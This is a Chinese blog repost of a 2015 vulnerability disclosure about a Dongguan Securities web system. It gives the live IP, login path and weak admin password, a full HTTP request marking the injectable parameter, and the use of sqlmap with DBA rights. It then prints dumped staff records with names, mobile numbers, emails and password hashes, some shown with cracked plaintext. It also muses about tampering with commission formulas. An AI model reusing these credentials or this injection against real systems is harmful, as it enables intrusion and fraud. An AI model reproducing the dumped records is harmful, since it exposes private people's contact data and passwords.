记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

东莞证券某站弱口令到SQL注入导致用户(姓名\电话\邮箱等)信息泄露

2015-12-27 04:00

http://113.78.134.110:81/login.do 弱口令admin:000000

11.png

发现了一些有意思的功能,比如可以控制提成

11.png

若是我直接修改了提成的公式,然后勾搭一两个人那啥(好暴利)。

漏洞证明:

code 区域
POST /plug-in/FormulaEdit/xcfa/XCFA_operater.jsp?MODE=getRYJB HTTP/1.1

Host: 113.78.134.110:81

Content-Length: 7

Accept: */*

Origin: http://113.78.134.110:81

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://113.78.134.110:81/plug-in/common/transfer.jsp?ObjName=JspXCFA_ALL&Title=%E8%96%AA%E9%85%AC%E6%96%B9%E6%A1%88%E6%9F%A5%E7%9C%8B&Target=%2FUIProcessor%3FTable%3DJspXCFA_ALL%26ObjDescribe%3DekQgsYuZOYlCJlO7vghYvv41*q*BGee3

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2

Cookie: JSESSIONID=CD1D8642528FC7F86453EDE89D86BA6D.server1; UserID=admin; PortalToken=CD1D8642528FC7F86453EDE89D86BA6D.server1; ys-TreeState_5c1e7d68efba511c6e0ea9b8cafa4fb3.gt=o%3ARoot%3Ds%253AE%5EType.0%3Ds%253AE%5EType.1%3Ds%253AE; ys-TreeState_93782624d81163345d84577e158e26bd.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_799cde630a734708b3880f841ffa3f7d=o%3A1%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_e0b9adc1f800d29087017abd5def90cb.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_ed9b71d747488ab403c5cbf458822293.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_190cd205bb5a88c520b1fb91a3415f3a.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_7ef60d9127bb21b3203ca468ff919460.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_aa1c2e4bf18892844e938f68b2de3da1.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_293313064b95482991c003a03ac389b8.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE



RYFL=24

直接丢sqlmap里面,发现还是DBA权限

11.png

查看到用户量不大,才1W多些

11.png



但是涉及到用户的姓名,电话,邮箱等基本信息,提取了最近的部分

code 区域
787134,6014436,\\u8881\\u52b2\\u94ba,xtheme-blue,5463610,1,[email protected] ,13672920390,main|document_manage|remoteAccount,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5078,96e79218965eb72c92a549dd5a330112 (111111),5078101,0,2015-06-05 17:15:00,2014-12-16 16:28:31,6,5078101,2014-12-16 16:28:31

83462,6014452,\\u5218\\u4e9a\\u521a,xtheme-blue,NULL,1,NULL,15231525063,main|document_manage|remoteAccount,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5013,96e79218965eb72c92a549dd5a330112 (111111),5013101,0,NULL,2014-12-17 14:07:04,0,5013101,2014-12-17 14:07:04

19561,6014456,\\u8bb8\\u7ef4\\u5178,xtheme-blue,85822938,0,[email protected] ,18688061642,main|document_manage|remoteAccount,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5049,96e79218965eb72c92a549dd5a330112 (111111),5049101,0,NULL,2014-12-17 15:33:44,0,5049101,2014-12-17 15:33:44

82842,6014529,\\u738b\\u4e3d\\u8273,xtheme-blue,NULL,1,NULL,NULL,main|document_manage|remoteAccount,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5011,96e79218965eb72c92a549dd5a330112 (111111),5011101,0,2015-01-15 13:37:38,2014-12-24 10:25:45,1,5011101,2014-12-24 10:25:45

qijm,6014597,\\u7941\\u5609\\u654f,xtheme-blue,NULL,0,NULL,NULL,finance|remoteAccount,\\u8d22\\u52a1\\u7ba1\\u7406,10007,96e79218965eb72c92a549dd5a330112 (111111),admin,0,2015-03-05 09:07:49,2014-12-31 15:56:36,38,admin,2014-12-31 15:56:36

71666,6014794,\\u6768\\u7389\\u9752,xtheme-blue,NULL,1,NULL,13591173727,main|document_manage,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5071,96e79218965eb72c92a549dd5a330112 (111111),5071101,0,NULL,2015-01-26 10:45:15,0,5071101,2015-01-26 10:45:15

71621,6014795,\\u90ed\\u715c,xtheme-blue,NULL,1,NULL,15904269933,main|document_manage,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5071,96e79218965eb72c92a549dd5a330112 (111111),5071101,0,NULL,2015-01-26 10:47:15,0,5071101,2015-01-26 10:47:15

69794,6014869,\\u8d75\\u7fe0\\u83b9,xtheme-blue,NULL,1,NULL,13790491703,main|document_manage,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5069,96e79218965eb72c92a549dd5a330112 (111111),5069101,0,2015-03-19 14:56:36,2015-02-09 15:02:45,3,5069101,2015-02-09 15:02:45

18406,6014874,\\u949f\\u94ed\\u7235,xtheme-blue,85186861,1,NULL,18825520374,main|document_manage,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5048,21218cca77804d2ba1922c33e0151105 (888888),5048101,0,2015-07-06 16:33:04,2015-02-10 10:16:15,23,5048101,2015-02-10 10:16:15

817275,6014904,\\u9ec4\\u4fca\\u6807,xtheme-blue,07566290229,1,[email protected] ,13660799890,main|document_manage,\\u8425\\u9500\\u4eba\\u5458\\u6570\\u636e\\u7edf\\u8ba1,5010,b82ef710e72ee35fc33bd9a454668b01,5010101,0,2015-06-05 16:44:12,2015-02-26 15:18:29,8,5010101,2015-02-26 15:18:29

居然发现了大量的弱口令...

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0163274

阅读:134969 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“东莞证券某站弱口令到SQL注入导致用户(姓名\电话\邮箱等)信息泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云